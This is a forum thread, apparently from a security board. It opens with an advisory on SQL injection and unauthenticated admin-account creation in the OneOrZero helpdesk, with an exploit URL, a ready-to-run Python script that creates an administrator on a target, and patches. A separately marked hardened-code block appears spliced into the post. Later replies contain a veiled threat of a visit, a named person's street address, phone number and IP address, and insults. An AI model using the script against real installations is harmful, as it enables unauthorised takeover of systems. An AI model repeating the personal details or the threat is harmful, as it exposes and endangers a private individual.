SQL Injection

CourtneyDS

Problems :
- SQL Injection
- Admin Access

PHP Code/Location :


supporter/tupdate.php :


if($groupid == 'change'){
    $sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
    $result = $db->query($sql);
}


admin/install.php :


[...]
if($step == 2){

    echo "

    ";
    start("Helpdesk Installation", "center");
    if($HTTP_POST_VARS['first'] == ''){
        showError("first name");
        $flag = 1;
    }
    if($HTTP_POST_VARS['last'] == ''){
        showError("last name");
        $flag = 1;
    }
    if($HTTP_POST_VARS['user'] == ''){
        showError("user name");
        $flag = 1;
    }
    if($HTTP_POST_VARS['email'] == ''){
        showError("email address");
        $flag = 1;
    }
    if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
        showError("password");
        $flag = 1;
    }
    if($HTTP_POST_VARS['office'] == ''){
        showError("office");
        $flag = 1;
    }

    if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
        showError("password");
        $flag = 1;
    }

    if(!validEmail($HTTP_POST_VARS['email'])){
        showError("email");
        $flag = 1;
    }

    if($flag == 1){
        endit();
        exit;
    }
    [...]
    $pwd = md5($HTTP_POST_VARS['pwd1']);
    $query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
        '".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
        '".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
        '".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
        1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
    $db->query($query);
[...]


Exploits :


http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd"
(char(97,98,99,100))

To exploit the second one.. in python 2.2 :


import urlparse
import httplib
import string


class OneOrZero:
    def __init__(self, target, port, user, password):
        if port != "":
            self.port = str(port)
        else:
            self.port = "80"
        self.path = str(urlparse.urlparse(target)[2])
        self.target = str(urlparse.urlparse(target)[1])
        self.user = str(user)
        self.password = str(password)
        self.USER_AGENT = 'OneOrZero.py'
        self.CreateAdminAccount()

    def CreateAdminAccount(self):

        data = 'step=2&first=admin&last=admin&user=' + self.user + '&pwd1=' + self.password + '&pwd2=' + self.password + '&email=a@a.a&office=abcd'

        try:
            print "Connecting On " + self.target + "...\n"

            http = httplib.HTTP(self.target, self.port)

            print "Sending Data On " + self.target + "...\n"

            http.putrequest("POST", self.path + "/admin/install.php")

            http.putheader("Content-Type", "application/x-www-form-urlencoded")
            http.putheader("User-Agent", self.USER_AGENT)
            http.putheader("Host", self.target)
            http.putheader("Content-Length", str(len(data)))
            http.endheaders()

            http.send(data)

            code, msg, headers = http.getreply()

            print "HTTP Code : ", str(code)
            print "HTTP Connection : ", msg
            print "HTTP headers : \n", headers, "\n"

            file = http.getfile()
            if string.find(file.read(), "Administrator Account Created Successfully.") != -1:
                print "Congratulations, Administrator Account Created Successfully."
                print "You Can Log In Here : http://" + self.target + self.path + "/admin/control.php"
                print "User : ", self.user
                print "Password : ", self.password
            else:
                print "Administrator Account Hasn't Been Created."

        except:
            print "Error During Admin Account Creation."


OneOrZero("http://www.target.com", "80", "NewUserName", "NewPassword")


You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")


Solution :

A patch (and more details in French) can be found on
http://www.phpsecure.info.

- In supporter/tupdate.php, add the lines (at the beginning) :



foreach ($_REQUEST as $key=>$value) {

    if (get_magic_quotes_gpc()==0) {
        $value = addslashes($value); // This will reproduce the option magic_quotes_gpc=1
    }

    $value = str_replace('(','()',$value);

    ${$key} = $value;
    $_REQUEST[$key] = $value;
    if (isset($_POST[$key])) { $_POST[$key] = $value; }
    if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
    if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
    if (isset($_GET[$key])) { $_GET[$key] = $value; }
    if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
    if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value; }
    if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
    if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}



- In admin/install.php.. put the lines :

$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
$result = $db->query($sql);
$num_rows = $db->num_rows($result);
if ($num_rows > 0){
    die("OneOrZero Is Already Installed.");
}


just after :

if($step == 2){


Credit to eLtorO


Sincerely
CourtneyDS
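A hardened replacement for the supporter/tupdate.php query quoted above, added here as an example and not part of the advisory or of OneOrZero: because $sg and $id are interpolated into the UPDATE without quotes, addslashes() alone does nothing for them (the exploit URL above contains no quote at all), so the values are validated as integers and bound through a prepared statement instead. It assumes $db is a PDO handle (the original uses the application's own $db wrapper) and $mysql_tickets_table holds the table name, as in the original.

```php
<?php
// Added example, not OneOrZero's code. Assumes $db is a PDO connection
// and $mysql_tickets_table is the ticket table name set by the application.

// Accept only a plain decimal integer. Input such as
// "groupid,description=char(97,98,99,100)" contains no quote, so
// addslashes() leaves it untouched; this check rejects it outright.
function strict_int($raw): ?int
{
    if (!is_string($raw) || !preg_match('/^-?[0-9]{1,10}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Identifiers cannot be bound as parameters, so the table name is
// checked against a conservative pattern before being interpolated.
function safe_identifier(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_]{1,64}$/', $name);
}

function update_ticket_group(PDO $db, string $table, $sg, $id): bool
{
    $group  = strict_int($sg);
    $ticket = strict_int($id);
    if ($group === null || $ticket === null || !safe_identifier($table)) {
        return false; // refuse the request instead of building a broken query
    }
    $stmt = $db->prepare("UPDATE `$table` SET groupid = :g WHERE id = :id");
    $stmt->bindValue(':g', $group, PDO::PARAM_INT);
    $stmt->bindValue(':id', $ticket, PDO::PARAM_INT);
    return $stmt->execute();
}

// Replacement for the block quoted from supporter/tupdate.php.
if (($_REQUEST['groupid'] ?? '') === 'change') {
    $ok = update_ticket_group(
        $db,
        $mysql_tickets_table,
        $_REQUEST['sg'] ?? null,
        $_REQUEST['id'] ?? null
    );
    if (!$ok) {
        http_response_code(400);
        exit('invalid ticket update request');
    }
}
```

The same pattern (validate, then bind) applies to the INSERT in admin/install.php; the install-guard from the patch above should still be kept, since it closes the separate problem of the installer being reachable after installation.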
 
I challenge this theory of attack.

All you have to do is delete the install file


If that's done this exploit is null. :rolleyes:
 
Excellent and very well thought out rebuttal Rejean / Eyelfixit.. lol ...

Would you care to be more technically in-depth about the ramifications deleting the "Index" would pose on the SQL ? ... How would deleting the Index stop a SQL Injection ? ...

^^ I already know what will happen.. but since you like to challenge.. I want to hear it from you ...

I wait for your technical response with a big smile :D

Sincerely
CourtneyDS
 
I never said delete the index file, I said delete the install file right after you're done installing and you're O.K.

Oh and here is a little info that courtneyBS doesn't want you to know:



SQL Injection is simply a term describing the act of passing SQL code into an application that was not intended by the developer. Since this topic is not specifically restricted to SQL Server it is not included in the normal FAQ. In fact, much of the problems that allow SQL injection are not the fault of the database server per-se but rather are due to poor input validation and coding at other code layers.

normal user (no fixed server or database roles)
Ability to natively access all objects in the database to which this account has been given access. At best, this may mean only being able to run some stored procedures. At worst, this means possible read/write access to all tables and views.

How can I prevent SQL Injection in my applications?

Here are some tips for avoiding SQL injection issues:

- If a user is asked to input a number, verify the data type using ISNUMERIC or equivalent functions
- For string data, replace single quotes with two single quotes using the replace function or equivalent:
  goodString = Replace(inputString, "'", "''")
- Use stored procedures to abstract data access so that users do not directly access tables or views
- When using stored procedures, implement them using the ADO command object so that variables are strongly typed
- Establish strong coding standards involving code review and peer-test often

How do I test if an existing application is subject to SQL Injection?

A method I recommend is that you briefly (on a test platform) disable error handling so that ODBC errors or SQL Server errors are displayed. Then, you can simply try inputting single quotes into your application to see if you can cause it to fail. A failure is usually indicative of poor validation and corruption of the SQL string. These are good hot-spots for the application.

As always, good code review is the best method. Take the time to do it or hire someone to do it. Better to pay now than later when the costs are not known

How to avoid SQL Injection?
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric values, convert them to an integer before putting them into the SQL statement, or use ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask


courtneyBS is just that, full of Bull_****


:p
 
I would strongly advise reading Davids forum rules prior to posting Rejean Houl / Eyelfixit ...

In all actuality.. a close friend of mine lives right in Burnaby British Columbia.. maybe he should pay you a visit and teach you some manners ... Can he call you first ? <<>> 604-777-0488.. or just drop on by ?

David.. a strong warning is needed for the child from Balmoral Street ... I guess name calling with a lot of cut and pasted data makes him feel important ...

Thanks in advance David

Sincerely
CourtneyDS

Ps : His IP = 24.69.255.205 ... It's out of Calgary Alberta Canada

Court
 
Ouch, I guess the truth hurts eh?

Oh and I never called you ANY names, All I said is that I think you're full of it, And you are :D

Oh and just in case you want to send this close friend here is my full information (cause you're so wack you couldn't scare a fly):


Rejean Houle A.K.A. Eyelfixit

307-7050 Balmoral St.
Burnaby, B.C. Canada
V5E 3K4

Tel: (604) 777 0488

Tell your little friend to come and see me, no need to call.

Now back to forum business, you're so weak and meager that you've been reduced to simple and idle threats. In my opinion you're making yourself look quite pathetic. :D

Oh and just so your simple mind can understand this. This is not "name calling" these are just my opinions.
 
courts
I guess name calling with a lot of cut and pasted data makes him feel important ...

rejean houl eh, yo rejean, ur the one showin ur ignorance dude cuz you dont know sheeot bro!
 
It's funny how you only come out and post when courtneyBS is in trouble.

Nor do I want to beef with you. I have no problems with you and I do not wish to start anything else. This is between me and courtneyBS so please.
 
eyelfixit said:
It's funny how you only come out and post when courtneyBS is in trouble.

Nor do I want to beef with you. I have no problems with you and I do not wish to start anything else. This is between me and courtneyBS so please.

dude man, i dont look at this board all the time cuz there aint nothing happening just cruised by today and read your junk.
i dont want no probs with you dude, courts is puttin up code n ur copying sheeot from another site. dude man, you dont even know her code can be changed around for any sql. thats what im sayin bro, you dont know whats up n ur showin peeps that you dont know nothin! peeps are gonna read what you posted and laugh at ur arse! jus shut up n peeps wont really know how dumb you are!
 